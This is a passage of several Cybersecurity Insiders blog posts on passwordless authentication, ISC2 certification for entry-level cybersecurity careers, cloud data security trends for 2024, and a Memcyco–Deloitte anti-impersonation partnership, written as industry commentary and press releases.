While protecting ourselves in the here and now is vital, organisations also need to look to the future. But what does that future look like? According to Ping Identity’s General Manager, EMEA, Paul Inglis, with backing from industry giants like Google and Amazon, “the momentum behind passwordless authentication is undeniable and many enterprise organisations are already on this digital transformation journey.”

Frederik Mennes, Director Product Management & Business Strategy at OneSpan, adds, “Upholding the integrity of your digital identity should be a top priority. This starts with passwordless protection which emerges as a viable alternative for securing critical systems that store sensitive data, providing defence against evolving threats by eliminating vulnerabilities associated with traditional passwords.”

According to Inglis, passwordless authentication is a beacon of hope, “a paradigm shift to enhance security and user convenience significantly.” Ping Identity research reveals that 59% of UK consumers would switch to a different brand or service that offered them passwordless as a means of logging in. Inglis adds that “this change will fundamentally reduce fraud and give consumers more security to freely navigate the digital world without fear of scams.”

The transition to passwordless, then, is not just about throwing away passwords; rather, it is a transformative step towards secure, open-ended and low-friction digital identity.

Final thoughts

Digital security has reached a tipping point this Change Your Password Day. Passwordless authentication provides a sneak preview of what secure future digital identities will look like and, although the adoption of passwordless technologies is still in its infancy, it is indicative of changing perceptions about what it means to be safe in an increasingly web-based environment.

In conclusion, Change Your Password Day must be more than a cursory nod to security – it must be a clarion call for systemic change. As we await further contributions from industry experts, let us pivot towards embracing these emerging technologies, all the while maintaining vigilant, robust security practices. This is not just a step but a leap towards a future where our digital lives are as protected as they are connected – a future where our security is not just reactive, but proactive, comprehensive, and deeply integrated into the fabric of our digital existence.

The post Change Your Password Day: Navigating the Shift Towards a Passwordless Future appeared first on Cybersecurity Insiders.

With the current threats to cyber stability around the world, there has never been a greater urgency for cybersecurity professionals than now. Organizations are investing more time, money and talent in detecting and mitigating cyberattacks. The result is a boom in demand for skilled cybersecurity professionals.

Entry-level cybersecurity roles require foundational knowledge and skills. They serve as stepping stones for professional growth. But how do you get started in the field? ISC2, creator of the top advanced cybersecurity certification, the CISSP®, recommends these specific steps.

  1. Become an ISC2 Candidate. Begin your journey by joining ISC2, the world’s leading cybersecurity professional organization, more than 500,000 members, associates and candidates strong. As part of their One Million Certified in Cybersecurity pledge to help close the workforce gap, you’ll be able to access free Official ISC2 Online Self-Paced Training for Certified in Cybersecurity entry-level certification and a free exam. Candidates can also tap a full range of benefits, including 20% off online training and up to 50% off textbooks. Sign up now to get your first year free.
  2. Start your journey toward CC certification. Certified in Cybersecurity (CC) certification from ISC2 creates a clear pathway to an exciting and rewarding career. The certification breaks down traditional barriers to entry, enabling you to build confidence and begin your first cybersecurity role ready for what’s next. No work experience in cybersecurity or formal educational diploma/degree is required.

CC is a great fit for IT professionals, career-changers; college students or recent graduates; and executives seeking foundational knowledge in cybersecurity.

  3. Keep learning. Cybersecurity never stands still. It’s a constantly evolving field that requires continuing education to stay in front of cyberthreats and on top of trends. Professionals can choose from a variety of flexible learning options, including:

ISC2 Certificates turn a laser focus on specific subject matters. And with courseware created on the hottest topics by cybersecurity’s most respected certifying body, you’re assured the most current and relevant content. Choose from online instructor-led or self-paced education with content created by industry experts:

Online Instructor-Led*
• Prerecorded lessons led by an ISC2 Authorized Instructor
• Instruction that complements self-paced content
• Digital badges upon passing certificate assessments

Online Self-Paced
• Online learning at your own pace
• Videos available for download on demand
• Digital badges upon passing certificate assessments

Current ISC2 Certificate areas of focus include cloud security, risk management, CISO leadership, healthcare, security engineering, and security administration and operations. Additional certificates coming soon.

ISC2 Entry-level Cybersecurity Skill-Builders will help you acquire valuable skills as you pursue a career in cybersecurity. Grow what you know with short-format learning designed to fit your busy schedule.

A career in cybersecurity provides the opportunity to make a significant impact on the world. Qualified professionals are indispensable to organizations, safeguarding their information and systems. See yourself in cybersecurity and get started today. Learn More.

More questions about CC? Get Answers in the Ultimate Guide, everything you need to know about CC. Download Now.

*Online instructor-led only available for select certificates.

The post Thinking about a Career in Cybersecurity? Follow this Path appeared first on Cybersecurity Insiders.

[By Dan Benjamin, CEO and Co-Founder of Dig Security (acquired by Palo Alto Networks)]

Large Language Models (LLMs) and generative AI were undoubtedly the biggest tech story of 2023. While the ever-changing nature of AI makes it difficult to predict the future, we can point to an emerging trend: enterprises are exploring use cases that involve ‘feeding’ the company’s own data to a large language model, rather than relying on the general-purpose chatbots provided by the likes of OpenAI and Google.

As companies begin to move generative AI projects from experimental pilot to production, concerns about data security become paramount. LLMs that are trained on sensitive data can be manipulated to expose that data through prompt injection attacks, and LLMs with access to sensitive data pose compliance, security, and governance risks. The effort around securing LLMs in production will require more organizational focus on data discovery, classification and access governance, in order to create transparency into the data that ‘feeds’ the language model and ensure authorized access to it.

Advancements in AI are just one of many challenges – and opportunities – tech leaders faced in 2023. The continued acceleration of cloud adoption, evolving tactics of bad actors, and increasingly stringent data privacy regulations have contributed to a challenging data security landscape. To address these challenges, security leaders, and the tools and processes they use, must evolve in 2024.

Here are a few other trends I anticipate for 2024.

Consolidation of data security tooling

As organizations have moved to the cloud, their infrastructure has become increasingly fragmented. With multi-cloud and containerization becoming de-facto standards, this trend has intensified. Data storage and processing are dispersed, constantly changing, and handled by multiple vendors and dozens of tools.

To secure data, businesses found themselves investing in a broad range of tooling – including DLP for legacy systems; CSP-native solutions; compliance tools; and more. In many cases two separate tools with similar functionality are required due to incompatibility with a specific CSP or data store.

This trend is now reversing. Economic pressures and a growing consensus that licensing and management overhead have become untenable are leading organizations toward renewed consolidation. Businesses are now looking for a single pane of glass to provide unified policy and risk management across multi-cloud, hybrid, and on-premises environments. Security solutions are evolving accordingly – moving from point solutions that protect a specific data store toward more comprehensive platforms that protect the data itself, wherever it’s stored and in transit.

Maturation of compliance programs

Organizations are realizing that compliance needs to be more than an annual box-ticking exercise. With regulators increasingly willing to confront companies over their use and protection of customer data, it’s become clear that compliance needs to be a strategic priority.

Businesses will invest more in programs that enable them to map their existing data assets to compliance requirements, as well as tools that help identify compliance violations in real time – rather than waiting for them to be discovered during an audit (or in the aftermath of a breach).

The post Cloud Data Security in 2024 appeared first on Cybersecurity Insiders.

Memcyco Inc, the real-time digital impersonation detection and prevention solution provider, and Deloitte, the leading consulting, advisory, and audit services firm, today announced their strategic partnership in the cybersecurity sector. The partnership enables Deloitte to extend its range of solutions, offering customers Memcyco’s industry-leading anti-impersonation software. The solutions will be offered globally in regions such as EMEA, LATAM, the USA, and others.

Deloitte and Memcyco’s pivotal collaboration combines the former’s consulting expertise with the latter’s cutting-edge platform for detecting and preventing digital impersonation fraud in real time. This alliance will elevate fraud prevention to a new level, helping government organizations, enterprises, and brands protect themselves from damage and safeguard their reputations from being tarnished through attacks that use phishing sites to target their customers.

By virtue of their partnership, Memcyco and Deloitte will leverage additional solutions related to integration and cooperation, such as Deloitte’s Strategic & Reputation Risk Services. This multidisciplinary synergy ensures a holistic response to threats, capitalizing on each organization’s area of expertise and accumulated experience, thus offering more robust and complete solutions to clients.

Memcyco provides a platform for real-time detection, protection, and response to online impersonation attacks, whereby malicious actors use phishing, smishing, and other techniques to direct customers to fake pages that look and feel much like the real thing. These attacks trick users into giving up their personal data, such as login credentials and credit card information, which is subsequently used for ATO (account takeover) and other online attacks, leading to data breaches, theft of funds, and ransomware.

Unlike other solutions, Memcyco is singularly able to safeguard the “window of exposure” between when a fake website goes live and when the attacker attempts to use stolen data to access company web pages, using real-time alerts to warn users not to trust the spoofed site, as well as tracking attacker and victim activity. Addressing this window is crucial for organizations to be able to protect themselves from data breaches, financial losses, and reputational damage while protecting their customers from identity theft and financial harm.

Memcyco also provides organizations with full insight into attacks, including a list of all victims. This data not only gives the organization improved visibility, but also helps risk engines to predict fraud more accurately, thereby significantly decreasing remediation costs.

“Memcyco is delighted to build a partnership with Deloitte due to its dedicated team, expertise, and innovation capabilities,” said Israel Mazin, CEO of Memcyco. “Our shared commitment to empowering organizations to make informed decisions about their cybersecurity strategy is at the heart of our collaboration. In the long term, this partnership will pave the way for organizations of all sizes to mitigate impersonation and brandjacking attacks and to gain more trust from their customers.” 

Memcyco will showcase its solutions at the third annual Deloitte Cyber iCON event in Spain on Jan 23, 2024. Cyber iCON allows businesses to gain first-hand knowledge about the most prevalent and sophisticated cyber threats they face today. Attendees will be able to learn about the latest strategies and countermeasures they can employ to safeguard themselves against advanced threats via real-world, interactive scenarios. Memcyco’s representatives will join Deloitte’s experts on-stage to discuss the dangers presented by digital impersonation and to introduce businesses to their comprehensive solution for mitigating such risks. Memcyco will also participate in a joint panel discussion and presentation alongside Deloitte’s expert cybersecurity consultants. 

About Memcyco

Memcyco provides real-time digital impersonation detection, protection and response solutions to companies and their customers. Its real-time, agentless solutions are unique in fully safeguarding the critical “window of exposure” between when a fake site goes live and when an attacker attempts to use stolen data to access company web pages. Memcyco alerts users who visit fake sites and gives organizations complete visibility into the attack, allowing them to take remediating actions. Led by industry veterans, Memcyco is committed to ensuring the security and digital trust of its customers – and of their customers. For more information, visit www.memcyco.com/.

About Deloitte

Deloitte has contributed to the development of business organizations and society during its more than 175 years of history. Faced with a constantly evolving reality, it has established itself as the advisor of reference for the transformation of large national and multinational companies, using a multidisciplinary approach based on excellence, technological innovation and the continuous development of the talent of its professionals, maintaining its position as a leading professional services firm. The organization has strengthened its position by impacting clients, communities and people through the Make an impact that matters initiative, which is implemented in social action programs (WorldClass), action against climate change (WorldClimate), and its ALL IN diversity and inclusion strategy. Globally, the firm is present in more than 150 countries, where more than 345,000 professionals work. Learn more at: www.deloitte.com/.

The post Deloitte Partners with Memcyco to Combat ATO and Other Online Attacks with Real-Time Digital Impersonation Protection Solutions appeared first on Cybersecurity Insiders.